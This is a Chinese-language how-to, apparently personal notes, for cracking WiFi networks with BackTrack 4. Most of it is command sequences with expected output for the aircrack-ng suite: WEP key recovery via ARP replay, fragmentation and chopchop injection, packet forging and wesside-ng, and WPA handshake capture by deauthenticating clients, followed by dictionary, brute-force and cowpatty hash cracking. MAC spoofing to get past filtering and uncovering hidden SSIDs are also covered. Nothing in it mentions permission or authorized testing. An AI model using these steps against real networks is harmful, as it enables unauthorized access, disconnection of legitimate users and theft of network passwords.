bt4 wifi 破解

---------------------pre---------------------
1.下載光碟版BT4.iso,copy其中的boot和bt4到U盤，windows下執行bootinst.bat安裝到U盤。VM版的BT4可能對整合的無線網路卡支

持不太好，USB無線網路卡則支援得很好。

或者用硬碟啟動方式：下載光碟版BT4.iso,解壓其中的boot和bt4到D盤根目錄,下載grub4dos,解壓其中的grldr、menu.lst、

grldr.mbr，放C盤根目錄下
    編輯bcd:
    bcdedit  /create  /d "Grub"  /application bootsector
    回顯: 項 {5e098857-4818-11de-b43e-001eec90feb6} 成功建立。
    接著用下面的指令來設定引導引數,{id}替換為上面回顯的ID，建議用複製貼上
    bcdedit  /set {id} device boot
    bcdedit  /set {id} path \grldr.mbr
    bcdedit  /displayorder {id} /addlast
    設定等待時間
    bcdedit /timeout 5
    (
    如果要解除安裝，執行
    bcdedit
    檢視Grub的{id}後，
    bcdedit /delete {id}
    )

2.啟動BT4，選console控制檯模式，使用者名稱root,密碼toor<注意不是root>,再執行sta盤盤rtx啟動視窗模式。
另：BT4啟動黑屏問題解決辦法
輸入root toor 登入系統後在輸入 fixvesa 然後 startx如果不行就輸入 fixvmware,然後輸入startx.還是不能就輸入Xorg -

configure 然後startx

我的筆記本產U盤啟動BT4，startx時按住空格可以進入.。

問題：我在啟動bt3 的時候，輸入startx黑屏
解答：在輸入使用者名稱root 和密碼toor 以後輸入xconf 這時會黑屏一會，然後出來提示符再輸入startx 可進入
win視窗；當實在不能進入win視窗的時候你也可以直接在提示符下輸入各破解命令，同時可用alt+f1 開啟
一個shell，alt+f2 開啟第二個shell，alt+f3 開啟第三個等。關閉視窗用PRINT SCREEN 鍵
---------------------end---------------------

[] 可選
<> 回顯
/  或者
() 提示

---------------------WEP---------------------
shell 1:----------------------------------------
1.ifconfig -a
  <wlan0 ... xx:xx:xx:xx:xx:xx>
[
macchanger -m 00:11:22:33:44:55 wlan0
  <修改自己網路卡的MAC 地址。當對方設定了MAC 地址過濾時或為了方便後面輸入>
]
2.ifconfig -a wlan0 up
  (5100可能要載入網路卡才支援注入?)
3.airmon-ng start wlan0 6
  <monitor mode enabled on mon0>
  (6是頻道)
  另一說5100要支援注入用airmon-ng start wlan0
  如果這裡回顯<(monitor mode enabled)> 則下面命令所有埠號要用"wlan0"
[
aireplay-ng -9 mon0 / aireplay-ng --test mon0
  <Injection is working/No anwser>(注入攻擊成功/不成功)
  (檢測你的網路卡是否支援注入)
]
4.airodump-ng -w pack -c 6 mon0/wlan0
  (pack是隨便起的獲取的ivs的儲存檔案的名字)
  另一說用airodump-ng --ivs -w pack -c 6 mon0/wlan0

shell 2:----------------------------------------
一、有客戶端：
破解:abcd四種方式
a.合法客戶端產生大量有效的資料，能直接獲得大量cap。
收到10000以上data後，直接轉shell 3,破解密碼
b.合法客戶端只能產生少量資料，就需要注入<-3>攻擊加速產生大量資料。
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客戶端mac) mon0/wlan0(wlan0測試不行)
  <Read 11542 packets <got 12587 ARP ...>,send 71524 packets ... 很多類似行>
c.合法客戶端不在通訊，注入模式不成功，
用-0 衝突模式強制斷開合法客戶端和ap連線，使之重新連線，
新連線所產生的握手資料讓-3 獲得有效的ARP從而完成ARP注入
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客戶端mac) wlan0
6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客戶端mac) wlan0
  (可能要另開窗)
d.有客戶端，並且客戶端能產生有效arp 資料的另類破解方式
輸入modprobe –r iwl3945
  (載入網路卡)
輸入modprobe ipwraw
輸入airmon-ng start wlan0 6
現在，只要一個命令就搞定，輸入:
輸入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。
<key: 12:34:56:78:90>

二、無客戶端：
5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0
  (我成功了)
  另一說用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0
  <Authentication successful>
  <Association successful>
  (建立虛擬偽裝連線)
  如果失敗可嘗試降低網路卡速率後再試:iwconfig mon0 rate 2M(注意大寫)
破解:abcd四種方式
a.-2 crack mode ---------------
  建立虛擬連線後直接用-2互動攻擊模式集合了抓包，提資料和發包攻擊
6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0
發包成功後可得到足夠的ivs，然後用aircrack-ng破解
b.-3 crack mode ---------------
6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon0
7.用aircrack-ng破解<自己新增的步驟?>
c.-4 crack mode ---------------
  -4攻擊模式；製造資料包；-2互動式攻擊模式
6.aireplay-ng -4 -b (APmac) -h (Mymac) mon0
  <?yes>
  <Saving keystream in replay_dec-0523-075615.xor>
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255 -y replay-xxx.xor -w myarp
  (提取上面xor 檔案來偽造一個arp包)
8.aireplay-ng -2 -r myarp mon0
  一說用aireplay-ng -2 -r myarp -x 512 mon0
 (發現了可利用的myarp的資料包，按y後，立刻注入攻擊。Date瘋漲)
9.用aircrack-ng破解
d.-5 crack mode ---------------
  -5碎片攻擊模式；製造資料包；-2互動式攻擊模式
  (我成功過)
6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0
  <?yes>
  <Saving keystream in fragment-1216-201426.xor>
  (利用-5 碎片攻擊模式獲得一個可用的包含金鑰是資料檔案（xor 檔案）)
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp
  (Myarp隨便起的檔名)
  <Wrote packet to: myarp>
8.aireplay-ng -2 -r myarp -x 256/512 mon0
  <?yes>
  (這時，前面的抓包視窗上的data 將迅速增加)
  (512是攻擊速度，1024是最大值)
9.採用aircrack-ng 來進行破解

shell 3:----------------------------------------
aircrack-ng *.cap
  如果shell 1用了--ivs 引數，則這裡用aircrack-ng *.ivs
  (我成功了)
  另一說用aircrack-ng -n 64 -b APmac pack-01.cap
  <KEY FOUND! [......] <ASCII:XXXXX>>

附:
5100用BT4+spoonwep2破解
1.把spoonwep2放在BT4\modules\下,啟動BT4
2.
ln -fs bash /bin/sh
ls -al /bin/sh
<顯示bash為成功,dash為失敗>
3.開spoonwep2，裡面可以找到網路卡了,選wlan0進入搜尋，但這時不會搜出來什麼，
關閉一下spoonwep2再重啟spoonwep2，
這時網路卡項裡有一個mon0的，選mon0,driver選normal,mode選unknow victim,選定PO841 replay attack，點選launch後就等待密

碼的出來(sata資料包到30000個左右)。
(注：論壇中的高手說spoonwep2支援5100AGN網路卡注入式破解)

---------------------end---------------------
---------------------WPA---------------------
1.ifconfig -a
  <wlan0 ... xx:xx:xx:xx:xx:xx>
2.ifconfig -a wlan0 up
3.airmon-ng start wlan0 6
  <monitor mode enabled on mon0>
  (6是頻道)
4.airodump-ng -w 12345 -c 6 mon0/wlan0
  (儲存名為12345.cap)
  (-w：寫入檔案，-c：擷取cap的頻道)
5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0
或者輸入：aireplay-ng -0 10 -a (ap mac) -c (合法客戶端mac) mon0/wlan0(wlan0可能不對)
  <18:56:20 Sending 64 directed DeAuth,... 一些類似行>
  (-c後面為合法無線客戶端的MAC地址)
  (迫使AP重新與已連線的合法客戶端重新握手驗證)
  (攻擊幾次後可以做破解嘗試。WPA破解不用等到資料Data 達到幾萬，
   因為它只要一個包含WPA握手驗證包就可以了)
Cap資料包破解:
a.暴力破解
6.aircrack-ng -x -f 2 12345*.cap
  另一說是用aircrack-ng -z -b (ap mac) 12345*.cap
b.字典破解
6.aircrack-ng -w password.txt 12345*.cap
  另一說是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap
  (
  -w：是字典破解模式
  Password.txt是你事先準備好的字典。
  技巧：可以在windows 下使用下載的字典工具生產字典，再在BackTrack3 下拷貝到/root 下（aircrack 預設
的工作目錄在/root）。
  請注意，破解WPA 密碼的時間取決於密碼難易程度，字典包含程度，記憶體及CPU 等。多則數小時。
   )
c.把CAP資料包拷貝出來在WIN下用WinAircrack 破解
  啟動WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap
                  Wpa-)Dictionary file-)pswd.txt,點右下角Aircrack the key...
  <Key Found! [xxxxxxxx]>
d.HASH破解
6.genpmk -f dictionary.txt -d D-LINK.hash -s D-LINK (注意大小寫)
  (Windows版本操作步驟與其Linux下版本完全一致)
  (
　　引數解釋：
　　-f 這裡跟上採用的字典
　　-d 生成的Table檔名稱
　　-s 目標AP的ESSID
   )
7.cowpatty -d D-LINK.hash -r *.cap -s D-LINK
  (
　　引數解釋：
　　-d 匯入WPA PMK Hash Table檔名稱，下圖中為dlink-birth.hash
　　-r 事先捕獲的WPA握手資料包
　　-s 目標AP的ESSID
   )

---------------------end---------------------

WPA破解，怎麼知道有握手包被截獲？
airodump-ng監視窗右上角有提示:
...... WPA handshake: 00:90:4c:8e:00:65

BT4抓包後，cap檔案儲存在哪？
輸入ls可以看到啊,預設在root下。

如何獲得合法端mac？
windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具實現對客戶端MAC的攔截，Linux可用

Kismet、Aircrack-ng中的airodump-ng等來實現。需要注意的是，若目標網路採用WEP或者WPA加密的話，有時需先行破解再對資料

包解密方可看到客戶端MAC。
前面第一個shell，如下若有station顯示,bb:bb:bb:bb:bb:bb就是合法客戶端mac
BSSID             STATION ...
aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb

如何查詢隱藏的SSID？
1.在BT4下先開啟一個shell,輸入
    airodump-ng 網路卡埠
2.開啟另一個shell,輸入
    aireplay-ng -0 10 -a AP'MAC -c 合法客戶端'MAC 網路卡埠
可能這個命令由於頻道不對會出錯,這時就要多重輸幾次(如果不行,就是不是合法客戶端,要再試其它的客戶端),直到提示成功為止
3.然後就可以在上個shell,看到顯示出來的SSID。